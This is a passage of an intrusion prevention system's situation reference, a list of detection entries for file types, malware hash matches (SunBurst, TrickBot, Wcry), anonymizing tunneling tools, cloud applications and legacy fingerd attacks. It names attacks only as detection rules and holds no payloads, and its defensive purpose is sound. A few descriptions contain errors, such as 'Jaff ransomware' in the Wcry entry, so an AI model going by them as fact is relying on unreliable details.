Description: Snappy is a compression algorithm developed by Google. Its main design principle is not to aim for maximum compression but reasonable compression with a very high speed.
Back to top

File_Sophos-AntiVirus-Update

About this situation: Sophos Antivirus update file detected
Context: File Type
Severity: 1
Tags: Sophos AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-750-5211
Description: Sophos Antivirus update file deliveres up-to-date malware detection database and associated metadata for the various security products using the Sophos antivirus engine.
Back to top

File_Starloader-Malware-Binary-SHA1

About this situation: Starloader Malware binary SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1020-5242
Description: A file that has a SHA1 checksum matching to Starloader Malware binary has been detected.
Back to top

File_StuffIt-Archive

About this situation: StuffIt archive file detected
Context: File Type
Severity: 1
Tags: StuffIt Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: StuffIt is a proprietary file compression and archiving format developed by Alladin Systems in 1987. StuffIt was especially popular on classic Apple MacIntosh, and was bundled as a part of the operating system.
Back to top

File_SunBurst-Backdoor-MD5

About this situation: SunBurst Backdoor match
Context: File MD5 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Description: A file that has a MD5 checksum matching SunBurst Backdoor has been detected. The below license applies to the content of this situation: Copyright 2020 by FireEye, Inc. The 2-Clause BSD License Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Back to top

File_SunBurst-Backdoor-SHA1

About this situation: SunBurst Backdoor match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Description: A file that has a SHA1 checksum matching SunBurst Backdoor has been detected. The below license applies to the content of this situation: Copyright 2020 by FireEye, Inc. The 2-Clause BSD License Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Back to top

File_SVG

About this situation: SVG file detected
Context: File Type
Severity: 1
Tags: SVG, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Scalable Vector Graphics (SVG) is a vector image format for 2D graphics and animations, developed as an open standard by the World Wide Web Consortumium. MIME type: image/svg
Back to top

File_Symantec-AntiVirus-Update

About this situation: Symantec Antivirus update file detected
Context: File Type
Severity: 1
Tags: Symantec AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-767-5211
Description: Symantec Antivirus update file delivers detection and disinfection updates as well as associated metadata for security products developed by Symantec.
Back to top

File_Tango_Messenger-Binary-MD5

About this situation: Tango Messenger Binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Tunneling Protocols
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-941-5242
Description: Tango Messenger Binary file transfer was detected.
Back to top

File_Tar-Archive

About this situation: Tar archive file detected
Context: File Type
Severity: 1
Tags: Tar Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Tape Archive, or tar, is a generic file archiving program developed for Unix in 1979, and still commonly used. Tar does not provide compression, tar files are typically compressed with an external compression utility such as gzip. MIME type: application/x-xar
Back to top

File_TeleDisk-Image

About this situation: TeleDisk image file detected
Context: File Type
Severity: 1
Tags: TeleDisk Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-745-5211
Last changed: sgpkg-ips-745-5211
Description: TeleDisk is a legacy disk imaging and archiving program created for MS-DOS. It is able to create compressed disk images for non-standard disks.
Back to top

File_Text-IP-Address

About this situation: File that contains an IP address detected
Context: File Type
Severity: 1
Tags: Small text file, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Description: A text file that contains an IP address has been detected. This kind of files are used by various services to report externally visible IP address to client application.
Back to top

File_Text-US-Ascii-Text-File

About this situation: File that contains US-ASCII detected
Context: File Type
Severity: 1
Tags: Text, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1686-5242
Last changed: sgpkg-ips-1686-5242
Description: A file containing US-ASCII and not being identified as anything more specific was detected.
Back to top

File_TIFF-Image

About this situation: Tagged Image File Format (TIFF) file was detected
Context: File Type
Severity: 1
Tags: TIFF Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Tagged Image File Format (TIFF) file is an image file format widely used to store raster images. Its common uses include storing scanned images, photos and faxes. The format has been standardized within ANSI IT8.81993 and ISO 12639:1998. MIME type: image/tiff
Back to top

File_TiVo-Ty-Recording

About this situation: TiVo Ty video file detected
Context: File Type
Severity: 1
Tags: TiVo Ty Recording, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: TiVo Ty is a file format that encapsulates MPEG-2 data, typically recorded from a television broadcast.
Back to top

File_TOR-Browser-Binary-MD5

About this situation: TOR Browser binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Tunneling Protocols
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-853-5242
Description: TOR Browser Binary file transfer was detected. TOR Browser is a network traffic anonymization tool.
Back to top

File_TrickBot-Malware-SHA1

About this situation: TrickBot Malware SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-927-5242
Last changed: sgpkg-ips-927-5242
Description: A file that has a SHA1 checksum matching to TrickBot malware has been detected.
Back to top

File_Triton-DDS-Query-Data

About this situation: Triton DDS Query detected
Context: File Type
Severity: 1
Tags: Triton DDS data, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Description: Triton query was detected. Triton queries reqularly for database updates and license status changes.
Back to top

File_Triton-DDS-Response-Data

About this situation: Triton DDS Response detected
Context: File Type
Severity: 1
Tags: Triton DDS data, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Description: Triton DDS response was detected. Triton queries reqularly for database updates and license status changes.
Back to top

File_True-Type-Font

About this situation: True Type font file detected
Context: File Type
Severity: 1
Tags: True Type Font, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Description: True Type Font (TTF) is an outline font standard jointly developed by Apple and Microsoft.
Back to top

File_Type-Detection-Exception

About this situation: Exceptional chain of observations in file type detection
Context: File Filtering
Severity: 2
Tags: File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: An unusual chain of events was observed while detecting the type of file. For example the file name indicated a different file type than the content of the file. Or the beginning of the file indicated one file type, and further along in the file content another, conflicting file type was detected. As such this situation is not very unusual or severe. It may be an indication of an evasion attempt by disguising the file to look like another file type. If the type conflict was detected too late to perform a configured scan for the file, then the situation File_Scan-Missed is generated.
Back to top

File_Type-Unknown

About this situation: Unknown file type
Context: File Type
Severity: 2
Tags: File Filtering, Unidentified File, Internal Unusable File Type Tag, Internal File Type Tag
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: This is the initial file type for all file transfers. The file type can also change to this type during the file transfer, if identification events conflict with the previously identified type, indicating that the detected type was not correct.
Back to top

File_Ultrasurf-Binary-MD5

About this situation: Ultrasurf Binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Tunneling Protocols
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-852-5242
Description: Ultrasurf Binary file transfer was detected. Ultrasurf is a network traffic anonymization tool.
Back to top

File_UPnP-Device-Description

About this situation: UPnP device description file detected
Context: File Type
Severity: 1
Tags: UPnP Device Description, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Universal Plug and Play (UPnP) device description file detected.
Back to top

File_URSNIF-Malware-SHA1

About this situation: URSNIF Malware SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-946-5242
Last changed: sgpkg-ips-946-5242
Description: A file that has a SHA1 checksum matching to URSNIF malware has been detected. URSNIF spreads by malicious word document as an email attachment.
Back to top

File_UTF-Encoded-File

About this situation: UTF encoded file detected
Context: File Type
Severity: 1
Tags: Small text file, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1689-5242
Last changed: sgpkg-ips-1689-5242
Description: An UTF encoded file was detected.
Back to top

File_Valve-Steam-Data

About this situation: Valve Steam data file detected
Context: File Type
Severity: 1
Tags: Valve Steam Data, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-745-5211
Last changed: sgpkg-ips-745-5211
Description: Steam data files are generic data transferred by the Valve's Steam gaming platform client. It may contain various media content as well as executable contents such as games and platform updates.
Back to top

File_Valve-Steam-Lan-Sync

About this situation: Valve Steam Lan Sync file detected
Context: File Type
Severity: 1
Tags: Steam, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1117-5242
Description: Valve Steam is a gaming and game purchasing platform. A lan sync file transfer was detected.
Back to top

File_Valve-Steam-Serverlist

About this situation: Valve Steam Serverlist file detected
Context: File Type
Severity: 1
Tags: Steam, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-841-5242
Last changed: sgpkg-ips-841-5242
Description: Valve Steam is a gaming and game purchasing platform. A file listing available servers for a Steam game was detected.
Back to top

File_vCalendar

About this situation: vCalendar file detected
Context: File Type
Severity: 1
Tags: vCalendar, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-750-5211
Description: vCalendar (VCS) file format is used to share and deliver calendar events, such as meeting requests.
Back to top

File_Video-Ad-Serving-Template

About this situation: Video Ad Serving Template file detected
Context: File Type
Severity: 1
Tags: Video Ad Serving Template, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-762-5211
Last changed: sgpkg-ips-762-5211
Description: Video Ad Serving Template (VAST) is a specification for the communication between advertising servers and video players. It has been released by the Interactive Advertising Bureau (IAB).
Back to top

File_Visual-Basic-Script-Filename

About this situation: Visuabl Basic file detected
Context: File Type
Severity: 1
Tags: Visual Basic Script, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-774-5211
Description: Visual Basic Script (VBScript) is a programming language developed by Microsoft as a lightweight programming language. It was introduced within Windows 98. This detection is based on the file extension (".vbs"). MIME type: text/vbscript
Back to top

File_VMware-Disk-Image

About this situation: VMware disk image file detected
Context: File Type
Severity: 1
Tags: VMware Disk Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: VMware is a developer of virtualization products and hypervisors. VMWare disk image files contain the contents of the entire virtual hard drive for a given guest system.
Back to top

File_VPNFilter-Binary-MD5

About this situation: VPNFilter binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1070-5242
Description: A file that has a MD5 checksum associated to a file related to the VPNFilter Botnet was detected.
Back to top

File_WAR-Archive

About this situation: WAR archive file detected
Context: File Type
Severity: 1
Tags: WAR Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1451-5242
Description: WAR (Web Application Resource or Web Application Archive) files contain web application resources, such as Java ServerPages, JAR files, Java classes, and static web pages. MIME type: application/war-archive
Back to top

File_Waveform-Audio

About this situation: Waveform audi file detected
Context: File Type
Severity: 1
Tags: Waveform Audio, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-744-5211
Description: Waveform Audio File (WAVE or WAV) is an audio file standard used by Microsoft and IBM.
Back to top

File_Wcry-Ransomware-MD5

About this situation: Wcry Ransomware MD5 match
Context: File MD5 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-904-5242
Last changed: sgpkg-ips-904-5242
Description: A file that has a MD5 checksum matching to Wcry ransomware has been detected. Jaff ransomware spreads by wormed SMB exploit.
Back to top

File_Weather.com-Data

About this situation: Weather data from Weather.com detected
Context: File Type
Severity: 1
Tags: Weather.com data, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Description: Weather.com is a weather forecasting company owned by The Weather Company, a subsidiary of IBM.
Back to top

File_WebP-Image

About this situation: WebP file detected
Context: File Type
Severity: 1
Tags: WebP Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-744-5211
Description: WebP is an image format developed by Google that allows both lossless and lossy compression methods as well as animation.
Back to top

File_Webroot-BrightCloud-Category-Update

About this situation: Webroot BrightCloud category update file detected
Context: File Type
Severity: 1
Tags: Webroot BrightCloud Category Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-739-5211
Description: Webroot BrightCloud is a commercial reputation service that provides categorization and threat intelligence, for example, about URLs and IP addresses.
Back to top

File_WebVTT

About this situation: WebVTT file detected
Context: File Type
Severity: 1
Tags: WebVTT, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Description: WebVTT (Web Video Text Tracks) is a standard for displaying timed text.
Back to top

File_Windows-Imaging

About this situation: Windows Imaging file detected
Context: File Type
Severity: 1
Tags: Windows Imaging, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-743-5211
Last changed: sgpkg-ips-743-5211
Description: Windows Imaging (WIM) file format is used by Microsft as a disk based image format introduced with Windows Vista. It is used to deploy Windows disk images for example in a corporate network.
Back to top

File_Windows-Media-ASX

About this situation: Windows Media Advanced Stream Redirector (ASX) file detected
Context: File Type
Severity: 1
Tags: Windows Media ASX, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Windows Media Advanced Stream Redirector (ASX) is a metafile format designed to store a playlist of Windows Media files.
Back to top

File_WOFF

About this situation: WOFF file detected
Context: File Type
Severity: 1
Tags: WOFF, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Web Open Font Format (WOFF) is a outline font file format developed by World Wide Web Consortumium.
Back to top

File_Word-Perfect-Document

About this situation: Word Perfect document detected
Context: File Type
Severity: 1
Tags: Word Perfect Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Word Perfect is a word processing application originally developed for Data General One minicomputer in 1979, Currently it is developed by Corel. It uses its own proprietary binary document file format. MIME type: application/wordperfect
Back to top

File_XAR-Archive

About this situation: XAR archive file detected
Context: File Type
Severity: 1
Tags: XAR Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-737-5211
Description: XAR is a generic purpose extensible file archive and compression format. It is used, for example, by Apple as a software installation package format for Mac OS X. MIME type: application/x-xar
Back to top

File_XML

About this situation: XML file detected
Context: File Type
Severity: 1
Tags: XML, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1730-5242
Description: Extensible Markup Language (XML) is a markup language that contains rules how a document or a data stuctures are described, designed to be both human and computer readable. It has been standardized by W3C in 2008.
Back to top

File_XML-Signature

About this situation: XML signature file detected
Context: File Type
Severity: 1
Tags: XML Signature, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-767-5211
Description: XML Signature defines an XML syntax for digital signatures. It is defined in the W3C recommendation XML Signature Syntax and Processing.
Back to top

File_XPM

About this situation: X PixMap (XPM) file detected
Context: File Type
Severity: 1
Tags: XPM, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: X PixMap (XPM) is an image file format used by the X Window System. It is intended to be used with icon and other simple bitmaps.
Back to top

File_XSL

About this situation: XSL file detected
Context: File Type
Severity: 1
Tags: XSL, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1097-5242
Last changed: sgpkg-ips-1097-5242
Description: Extensible Stylesheet Language (XSL) is a language for XML document transformation and presentation. MIME type: text/xsl
Back to top

File_XZ-Archive

About this situation: XZ archive file detected
Context: File Type
Severity: 1
Tags: XZ Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-736-5211
Last changed: sgpkg-ips-736-5211
Description: XZ is an open source general purpose file archive and loseless compression utility. MIME type: application/x-xz
Back to top

File_Your-Freedom-Binary-MD5

About this situation: Your Freedom Binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Tunneling Protocols
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-852-5242
Description: Your Freedom Binary file transfer was detected. Your Freedom is a network traffic anonymization tool.
Back to top

File_Zip-Archive

About this situation: ZIP File detected
Context: File Type
Severity: 1
Tags: Zip Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Zip is a widely used file compression and archive format, originally developed by Phil Katz in 1989. The support for zip archive compression and decompression is typically included in modern operating systems. MIME type: application/zip
Back to top

Finale-Inventory

About this situation: Application Finale-Inventory detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud-based inventory order management for small and medium-sized businesses. Integrates seamlessly with ShipStation and QuickBooks. Bundle our software with barcode scanning hardware for a comprehensive inventory management system solution. Multi-lot capability, Multi-location, and more.
Back to top

Finalsite

About this situation: Application Finalsite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Finalsite brings cutting-edge web design and web software to independent schools, colleges, and organizations around the world.
Back to top

Finance-Logix

About this situation: Application Finance-Logix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Finance Logix is a financial planning software that combines the latest technologies with easy to use financial planning tools to help you grow your business.
Back to top

Financeware.com

About this situation: Application Financeware.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wealthcare financial planning software solutions feature the patented Comfort Zone methodology, a unique approach that delivers confidence in reaching future valued goals while avoiding unnecessary investment risk and lifestyle sacrifice.
Back to top

Financial Data and Services

About this situation: Sites that offer investment advice and news and quotations on stocks, bonds and other investment vehicles, but not online trading. Includes banks, credit unions, credit cards and insurance.
Context: URL Application Context
Severity: 1
Tags: Business and Economy, Business Usage, Private Data
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer investment advice and news and quotations on stocks, bonds and other investment vehicles, but not online trading. Includes banks, credit unions, credit cards and insurance.
Back to top

FinancialForce

About this situation: Application FinancialForce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FinancialForce.com is a cloud-based applications company that provides a cloud ERP solution for Force.com, a cloud computing platform from salesforce.com. FinancialForce.com supplies Accounting, Billing, Professional Services Automation (PSA), Revenue recognition, Human Capital Management (HCM) and Supply Chain Management (SCM) applications.
Back to top

FinanzInformatik

About this situation: Application FinanzInformatik detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FinanzInformatik is the IT service provider. It offers development and deployment of IT applications, networks and technical infrastructure operations to consulting, training and support. Its integrated banking solution OSPlus the company represents IT systems for the German banking market.
Back to top

Finario

About this situation: Application Finario detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Capex Clarity - On-Demand Solutions for Enterprise Capital Expenditure Management
Back to top

Finch-Asset-Management

About this situation: Application Finch-Asset-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Finch Asset Management provider of alternative asset management services, offers sophisticated institutional investors access to a suite of alternative investment products that have successfully achieved superior risk-adjusted absolute returns with minimal correlation to competing asset classes.
Back to top

Fine-Art-America

About this situation: Application Fine-Art-America detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fine Art America is the online art gallery for buying and selling fine art prints, framed prints, stretched canvas prints, posters, acrylic prints, metal prints, iPhone cases, Galaxy cases, throw pillows, duvet covers, shower curtains, tote bags, originals, and greeting cards.
Back to top

FinestShops

About this situation: Application FinestShops detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FinestShops made to manage Internet stores for retailers and manufacturers who do not have a large IT department to handle a professional e-commerce system in-house.
Back to top

Fing

About this situation: Application Fing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fingbox is a cloud system to monitor and manage your networks, based on Fing mobile and desktop Apps.
Back to top

Finger_0-Query

About this situation: Attempt to retrieve user list through fingerd
Context: Finger Client Stream
Severity: 2
Tags: Unix, Any Hardware, fingerd, CVE1999, Unix not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Finger-0-Query-User-Name-Disclosure
Description:
Back to top

Finger_Cfingerd-User-Accounts-Disclosure

About this situation: Attempt to list all valid users on a system with finger
Context: Finger Client Stream
Severity: 2
Tags: Linux, Any Hardware, cfingerd, CVE1999, Linux not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Finger-Cfingerd-User-Accounts-Disclosure
Description:
Back to top

Finger_Command-Execution

About this situation: Attempt to execute arbitrary commands through fingerd
Context: Finger Client Stream
Severity: 7
Tags: Unix, Any Hardware, fingerd, CVE1999, Unix not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Finger-Command-Execution
Description:
Back to top

Finger_Dot-User-Name-Disclosure

About this situation: Attempt to discover accounts never logged in
Context: Finger Client Stream
Severity: 2
Tags: Unix, Any Hardware, fingerd, CVE1999, Unix not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Finger-Dot-User-Name-Disclosure
Description:
Back to top

Finger_Fingerd-Bomb

About this situation: Fingerd denial of service
Context: Finger Client Stream
Severity: 2
Tags: Unix, Any Hardware, fingerd, CVE1999, Unix not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Finger-Bomb-DoS
Description:
Back to top

Finger_Request-Redirection-Attempt

About this situation: Finger redirection attempt
Context: Finger Client Stream
Severity: 2
Tags: Unix, Any Hardware, fingerd, CVE1999, Unix not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Finger-Redirection-Information-Disclosure
Description:
Back to top

Finnish-Customs

About this situation: Finnish Customs services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1086-5242
Description: Finnish Customs services usage has been detected.
Back to top

Finnish-National-Archives-Service

About this situation: Finnish National Archives Service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-600-5211
Description: The National Archives Service of Finland usage has been detected.
Back to top

Firebase

About this situation: Firebase usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1764-5242
Description: Firebase usage detected. Firebase is a web application backend tool and infrastructure provider.
Back to top

Firefox

About this situation: Endpoint Context Agent based Firefox detection
Context: EI Correlation
Severity: 1
Tags: Web Browsers, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1570-5242
Description: Mozilla Firefox Web Browser endpoint application has been detected.
Back to top

Firefox Crashreporter

About this situation: Endpoint Context Agent based Firefox Crashreporter detection
Context: EI Correlation
Severity: 1
Tags: Browser Related Connections, Endpoint
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Description: Mozilla Firefox Crashreporter endpoint application has been detected. Firefox web browser can send information back to Mozilla in case the browser crashes.
Back to top

Firefox Installer

About this situation: Endpoint Context Agent based Firefox Installer detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Firefox Installer endpoint application has been detected. This application is used for installing the Mozilla Firefox web browser.
Back to top

Firefox Plugin Container

About this situation: Endpoint Context Agent based Firefox Plugin Container detection
Context: EI Correlation
Severity: 1
Tags: Browser Related Connections, Endpoint
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1093-5242
Description: Mozilla Firefox Plugin Container endpoint application has been detected. Firefox uses plugin-containers to ensure the browser itself won't crash in case a plugin crashes.
Back to top

Firefox Telemetry

About this situation: Endpoint Context Agent based Firefox Telemetry detection
Context: EI Correlation
Severity: 1
Tags: Browser Related Connections, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Mozilla Firefox Web Browser Telemetry endpoint application has been detected. Firefox web browser automatically sends telemetry information to Mozilla unless configured not to do so in the settings.
Back to top

Firefox Updater

About this situation: Endpoint Context Agent based Firefox Updater detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description: Firefox Updater endpoint application has been detected. This application is used for updating the Mozilla Firefox web browser.
Back to top

Firefox-Captive-Portal-Test

About this situation: Firefox captive portal test detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-916-5242
Last changed: sgpkg-ips-916-5242
Description: Firefox is a free open source web browser by the Mozilla foundation. Upon startup it checks wheter it is behind a captive portal or have a direct Internet access.
Back to top

Firefox-Update

About this situation: Firefox update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1151-5242
Description: Firefox is a free open source web browser by the Mozilla foundation. Firefox update relies on HTTP and TLS/SSL for communications.
Back to top

FireText

About this situation: Application FireText detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
